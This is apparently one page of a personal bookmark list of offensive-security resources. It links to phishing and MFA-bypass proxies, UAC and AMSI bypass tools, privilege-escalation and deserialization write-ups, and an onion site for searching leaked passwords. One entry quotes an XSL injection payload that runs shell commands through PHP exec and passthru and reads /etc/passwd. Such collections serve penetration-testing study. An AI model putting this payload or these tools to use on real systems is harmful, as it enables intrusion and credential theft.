781 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
◄Older
page 26 / 40
Newer►
  • thumbnail
    kgretzky/evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
    October 19, 2020 at 9:57:40 AM UTC - permalink -
    QRCode
    - https://github.com/kgretzky/evilginx2
    bypass proxy phishing mfa reverse
  • thumbnail
    drk1wi/Modlishka: Modlishka. Reverse Proxy.
    October 19, 2020 at 9:57:09 AM UTC - permalink -
    QRCode
    - https://github.com/drk1wi/Modlishka
    bypass proxy phishing mfa reverse
  • The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix
    <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
      <script>confirm("We're good");</script>
       <!--
       <xsl:value-of select="php:function('exec','id')"/>
       <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/>
       <xsl:copy-of select="document('/etc/passwd')"/>
       <xsl:value-of select="php:function('passthru','ls -la /')"/>
       -->
       <xsl:value-of select="php:function('passthru','ls -la /')"/>
    
      </xsl:template>
    </xsl:stylesheet>
    October 16, 2020 at 3:57:50 PM UTC * - permalink -
    QRCode
    - https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/
    xslt injection command execution rce lfi
  • thumbnail
    hfiref0x/UACME: Defeating Windows User Account Control
    October 13, 2020 at 12:28:55 PM UTC - permalink -
    QRCode
    - https://github.com/hfiref0x/UACME
    uac bypass av uacme github tool
  • thumbnail
    leak - Cleartext password search
    October 12, 2020 at 1:42:44 PM UTC - permalink -
    QRCode
    - http://xjypo5vzgmo7jca6b322dnqbsdnp3amd24ybx26x5nxbusccjkm4pwid.onion/
    leak onion tor cleartext password pwd
  • thumbnail
    Abusing HTTP hop-by-hop request headers - nathandavison.com
    October 12, 2020 at 1:20:57 PM UTC - permalink -
    QRCode
    - https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers
    hop headers bypass waf header connection content type
  • thumbnail
    Using Burp Suite with Android devices - Laconic Wolf
    October 8, 2020 at 2:31:10 PM UTC - permalink -
    QRCode
    - https://laconicwolf.com/2019/07/21/using-burp-suite-with-android-devices/
    proxy burp android mitm adb
  • thumbnail
    Hacking Android app with Frida | by Adam Świderski | AndroidPub
    October 8, 2020 at 12:54:21 PM UTC - permalink -
    QRCode
    - https://android.jlelse.eu/hacking-android-app-with-frida-a85516f4f8b7?gi=68fa5a1d61c4
    frida android hook mitm
  • thumbnail
    The Powerful HTTP Request Smuggling 💪 | by Ricardo Iramar dos Santos | Oct, 2020 | Medium
    October 5, 2020 at 5:54:42 PM UTC * - permalink -
    QRCode
    - https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142
    smuggling mdm bounty
  • thumbnail
    Using cURL with AEM
    September 30, 2020 at 2:17:38 PM UTC - permalink -
    QRCode
    - https://helpx.adobe.com/experience-manager/6-3/sites/administering/using/curl.html
    curl aem
  • thumbnail
    A Hacker's perspective on AEM applications security - Speaker Deck
    September 30, 2020 at 1:34:36 PM UTC - permalink -
    QRCode
    - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security
    aem cve exploit prez tooling
  • thumbnail
    Logging BurpSuite with ELK Stack
    September 29, 2020 at 8:57:32 AM UTC - permalink -
    QRCode
    - https://bestestredteam.com/2018/06/28/elk-stack/
    elk burp logger++
  • thumbnail
    amsi-fail.azurewebsites.net/api/GenerateEnc
    September 25, 2020 at 12:20:32 PM UTC - permalink -
    QRCode
    - https://amsi-fail.azurewebsites.net/api/GenerateEnc
    amsi bypass
  • thumbnail
    DnsFookup
    September 25, 2020 at 10:22:29 AM UTC - permalink -
    QRCode
    - http://rbnd.gl0.eu/dashboard
    dns rebinding exfiltration fookup
  • thumbnail
    Breaking Out of Citrix and other Restricted Desktop Environments | Pen Test Partners
    September 23, 2020 at 4:33:00 PM UTC - permalink -
    QRCode
    - https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/
    citrix escape
  • thumbnail
    eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf
    September 3, 2020 at 9:03:04 AM UTC - permalink -
    QRCode
    - http:///tmp/mozilla_onemask0/eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf
    bypassing atp bypass antivirus
  • thumbnail
    Abusing SeLoadDriverPrivilege for privilege escalation - Tarlogic Security - Cyber Security and Ethical hacking
    September 2, 2020 at 5:25:50 PM UTC * - permalink -
    QRCode
    - https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
    seloaddriverprivilege driver privesc windows load kernel process token
  • thumbnail
    jackson_deserialization.pdf
    September 1, 2020 at 3:23:05 PM UTC - permalink -
    QRCode
    - https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf
    jackson unmarshalling deserialization java rce
  • Subdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings | by Eduard Toloza | Medium
    August 28, 2020 at 5:00:25 PM UTC * - permalink -
    QRCode
    - https://medium.com/@edu4rdshl/subdomains-enumeration-what-is-how-to-do-it-monitoring-automation-using-webhooks-and-5e0a0c6d9127
    enumeration findsubdomain finddomain automation cron job api
  • thumbnail
    Hakluke’s Guide to Amass — How to Use Amass More Effectively for Bug Bounties | by Luke Stephens (@hakluke) | Aug, 2020 | Medium
    August 28, 2020 at 4:49:26 PM UTC * - permalink -
    QRCode
    - https://medium.com/@hakluke/haklukes-guide-to-amass-how-to-use-amass-more-effectively-for-bug-bounties-7c37570b83f7
    amass enum domain subdomain
Links per page: 20 50 100
◄Older
page 26 / 40
Newer►
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation